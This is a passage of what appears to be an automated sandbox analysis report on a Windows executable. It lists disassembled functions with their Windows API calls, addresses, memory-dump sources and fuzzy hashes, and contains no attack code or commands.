                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0013DA74
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0013DA7B
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0013DA91
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0013DA98
                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0013DADC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0013DAB9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                          • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                          • Opcode ID: 3ce2d3968fd6db3c47bc2a30b713519d99c1aa769adc4cf540a49a0599e67d94
                                                                                                                                                                                                                                          • Instruction ID: 31658baae930b5dfdabf23f88a1a7c7643e3c757e646c32634ef8888051fb7f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ce2d3968fd6db3c47bc2a30b713519d99c1aa769adc4cf540a49a0599e67d94
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC0112F6500208BFEB119BA4DD89EF7766CE708701F404496F746E2441E7B49E848FB5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(0108DE80,0108DE80), ref: 0014097B
                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0108DE60,00000000), ref: 0014098D
                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(?,000001F6), ref: 0014099B
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 001409A9
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001409B8
                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(0108DE80,000001F6), ref: 001409C8
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0108DE60), ref: 001409CF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3495660284-0
                                                                                                                                                                                                                                          • Opcode ID: fe108b8ed92c0d5143553bb737f19f884eaf7611430bfa4c4cfa160fa317557d
                                                                                                                                                                                                                                          • Instruction ID: 700babacdded1ef0ad7f6d381aa9c29169dff708c78e3f39cf0cbbd584fdd6b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe108b8ed92c0d5143553bb737f19f884eaf7611430bfa4c4cfa160fa317557d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92F01D31442512ABD7425BA5EE98AE67A25BF05702F401015F24150CA0C7B594A5CFE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00151C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00151DC0
                                                                                                                                                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00151DE1
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00151DF2
                                                                                                                                                                                                                                          • htons.WSOCK32(?,?,?,?,?), ref: 00151EDB
                                                                                                                                                                                                                                          • inet_ntoa.WSOCK32(?), ref: 00151E8C
                                                                                                                                                                                                                                            • Part of subcall function 001339E8: _strlen.LIBCMT ref: 001339F2
                                                                                                                                                                                                                                            • Part of subcall function 00153224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0014EC0C), ref: 00153240
                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 00151F35
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3203458085-0
                                                                                                                                                                                                                                          • Opcode ID: 3d6a0b65c1f0aaf0f535c37f10b2d85df6a1994ea5c966211a12c6d3320a8fa2
                                                                                                                                                                                                                                          • Instruction ID: 1e0bd8aa1ba70ef2603b8f77a7644408deaad6b5bac12d7ac5a6730e7995d6e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d6a0b65c1f0aaf0f535c37f10b2d85df6a1994ea5c966211a12c6d3320a8fa2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68B1BC71204341AFC325DF24C885F6A7BA5AF84318F54894DF8665F2A2CB71ED4ACBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 000D5D30
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 000D5D71
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 000D5D99
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 000D5ED7
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 000D5EF8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1296646539-0
                                                                                                                                                                                                                                          • Opcode ID: f1a7f5688bfa8589af6f8dee23a2418abb349ff904c0fc30051f6a3ac6e5da4e
                                                                                                                                                                                                                                          • Instruction ID: df19fcd64fe3024a2e8341b2f34e52fd5dacb17cb5cbe46bfd960626b98d68e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1a7f5688bfa8589af6f8dee23a2418abb349ff904c0fc30051f6a3ac6e5da4e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3B17D34A0074ADBDB28DFA9C8407EEB7F1FF58311F14851AE8A9D7250D730AA91DB64
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001001B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 001000BA
                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001000D6
                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 001000ED
                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0010010B
                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 00100122
                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00100140
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1992179935-0
                                                                                                                                                                                                                                          • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                                                                                                                                          • Instruction ID: f9d0646df1ee6995eec4566cfc50607caa9f34f6d1e809ed4284e24dcf8d7e27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4813A72A00B069BE7259F68CC41BBBB3E9AF59364F24413AF591D76C1E7F0D9408790
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001061FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000F82D9,000F82D9,?,?,?,0010644F,00000001,00000001,8BE85006), ref: 00106258
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0010644F,00000001,00000001,8BE85006,?,?,?), ref: 001062DE
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001063D8
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 001063E5
                                                                                                                                                                                                                                            • Part of subcall function 00103820: RtlAllocateHeap.NTDLL(00000000,?,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6,?,000D1129), ref: 00103852
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 001063EE
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00106413
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                                                                                          • Opcode ID: f96aaf2f459fb1714b7164c18f06edf72c71266287e2e41b9a722aeac926f23f
                                                                                                                                                                                                                                          • Instruction ID: fc474a5468445a0886baaa890ecfa324947e0e986eced1c5215ce8a202be7363
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f96aaf2f459fb1714b7164c18f06edf72c71266287e2e41b9a722aeac926f23f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7851D172A00216ABEB258F64CC81EBF77A9FF54750F154629FC49DA1C0DBB4DCA0D6A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0015B6AE,?,?), ref: 0015C9B5
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015C9F1
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA68
                                                                                                                                                                                                                                            • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA9E
                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015BCCA
                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0015BD25
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0015BD6A
                                                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0015BD99
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0015BDF3
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0015BDFF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1120388591-0
                                                                                                                                                                                                                                          • Opcode ID: 1f6eb069d5d26a42fc8fefef0a56cfb7d2adbccd73bd530bb1d3dd5beab0efd0
                                                                                                                                                                                                                                          • Instruction ID: ad337ae7896299589a50830d895a41b5b2825508c6ffd48d7b5e4670b76ec213
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f6eb069d5d26a42fc8fefef0a56cfb7d2adbccd73bd530bb1d3dd5beab0efd0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29815B31208241EFD714DF64C895E6ABBE5FF84308F14855DF8A94B2A2DB31ED49CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0012F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(00000035), ref: 0012F7B9
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000001), ref: 0012F860
                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(0012FA64,00000000), ref: 0012F889
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(0012FA64), ref: 0012F8AD
                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(0012FA64,00000000), ref: 0012F8B1
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0012F8BB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3859894641-0
                                                                                                                                                                                                                                          • Opcode ID: dac38101c98118f62fd7fffa85aa9b54919026e7b6c153808e1c5974282ed46f
                                                                                                                                                                                                                                          • Instruction ID: b1fec4d2b716bf7476fa001f6879633afa390053d65f83761426984ba08bf86c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dac38101c98118f62fd7fffa85aa9b54919026e7b6c153808e1c5974282ed46f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D51B335500320AACF14AB65E895B79B3B4EF55314F21447FF805DF292DB708C95C7A6
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D7620: _wcslen.LIBCMT ref: 000D7625
                                                                                                                                                                                                                                            • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
                                                                                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 001494E5
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00149506
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014952D
                                                                                                                                                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00149585
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                          • String ID: X
                                                                                                                                                                                                                                          • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                          • Opcode ID: f305eb0b9b032c8c8b1072035ab544dac3bac975f3812b71052bc0bc827edb73
                                                                                                                                                                                                                                          • Instruction ID: e3204e9b7fcb650c04fbb95cc9927a47ff55c0536b676b22619cc07c2395e03f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f305eb0b9b032c8c8b1072035ab544dac3bac975f3812b71052bc0bc827edb73
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CE192316083419FD724DF24C881AABB7E4BF85314F15856EF8899B3A2DB31DD05CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                          • BeginPaint.USER32(?,?,?), ref: 000E9241
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 000E92A5
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 000E92C2
                                                                                                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000E92D3
                                                                                                                                                                                                                                          • EndPaint.USER32(?,?,?,?,?), ref: 000E9321
                                                                                                                                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001271EA
                                                                                                                                                                                                                                            • Part of subcall function 000E9339: BeginPath.GDI32(00000000), ref: 000E9357
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3050599898-0
                                                                                                                                                                                                                                          • Opcode ID: 1017e3b3c97f429409c826baef2ed9bccc90ff09163ee941a4114146554495e1
                                                                                                                                                                                                                                          • Instruction ID: 617acc051347457e4020110deaeacb5e46a16a70762365db6cdc1d0e20c25fe6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1017e3b3c97f429409c826baef2ed9bccc90ff09163ee941a4114146554495e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741BB30104250AFD720DF25DC84FBB7BA8EF46324F100629FAA4972E2C7709895CB62
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001407EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0014080C
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00140847
                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00140863
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 001408DC
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001408F3
                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00140921
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
